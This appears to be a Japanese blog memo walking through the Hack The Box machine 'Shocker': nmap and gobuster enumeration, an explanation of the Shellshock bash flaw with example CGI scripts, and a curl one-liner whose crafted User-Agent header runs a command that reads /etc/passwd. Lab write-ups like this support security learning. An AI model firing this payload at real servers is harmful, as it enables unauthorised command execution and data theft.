HTB_Shockr_Linux

Shocker workthrough

nmap → 80/tcp Apache httpd 2.4.18

    2222/tcp OpenSSH 7.2p2 脆弱性はある

ETagって何かできないの?

gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt

gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirb/common.txt

GNU bash の脆弱性 ~ shellshock 問題~ とは
GNU bash の脆弱性 ~ shellshock 問題~ は、 Linux で使用するシェルのひとつである GNU bash (Bourne-Again Shell) の環境変数の処理に存在する任意のコード実行などを許してしまう脆弱性です。 Web サーバ上で動作する CGI プログラムや Linux ベース組み込みシステムなど、非常に広範囲にわたって影響を与えるものです。

多くの Linux ディストリビューションがデフォルトのシェルとして、GNU bash を使用しています。

[nca@centos6.5 ~]$ ls -l /bin/sh
lrwxrwxrwx. 1 root root 4 Jul 28 04:37 2014 /bin/sh -> bash
この問題により、次のようなアプリケーションも、影響を受ける可能性があります。

* Web アプリケーション

Linux 系 Web サーバ上で mod_cgi あるいは、mod_cgid から起動される CGI プログラムが、 (明示的/暗示的に) GNU bash を呼び出している場合に、影響を受ける可能性があります。 なお、mod_php、mod_perl、および mod_python は環境変数を使用しないため、影響を受けないと考えられます。

Apache HTTP サーバの場合には、次のような条件を満たす場合、mod_cgi あるいは、mod_cgid から起動される CGI プログラムが稼働している可能性があります。

LoadModule cgi_module modules/mod_cgi.so、LoadModule cgid_module modules/mod_cgid.so のいずれかを有効にしている。
ScriptAlias /cgi-bin/ “/var/www/cgi-bin/” で指定されたフォルダにプログラムがある。あるいは、AddHandler cgi-script .cgi で指定された拡張子を持つプログラムがある。
(例) CGI プログラムそのものを シェルスクリプトで作成している場合

#!/bin/sh
echo “Content-type: text/plain”
echo
echo “vulnerable CVE-2014-6271 / CVE-2014-7169”
(例) CGI プログラム中で、(明示的/暗示的に)シェルを使って外部コマンドを呼び出している場合

C 言語で system/popen 関数を使用している
Python 言語で os.system/os.popen 関数を使用している
PHP 言語で system/exec 関数を使用している
Perl 言語で open/system 関数を使用している
<明示的な呼び出しの例>
#!/usr/bin/perl
print “Content-type: text/plain\n\n”;
system(“bash -c ‘echo CVE-2014-6271 / CVE-2014-7169′”);

#!/usr/bin/python
import os,sys
print “Content-type: text/plain”
print
sys.stdout.flush()
os.system(“echo CVE-2014-6271 / CVE-2014-7169”)

<暗示的な呼び出しの例>
#!/usr/bin/perl
print “Content-type: text/plain\n\n”;
$list=`/bin/ls -l *`; #ここで、暗示的に bash 経由で ls コマンドが実行される
print $list;

Exploit it with one liner

An simple example to cat /etc/passwd

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://localhost:8080/cgi-bin/vulnerable

You can use it to run any command that you want

Reverse Shell Generator

メモ
スポンサーリンク
kotohaをフォローする

コメント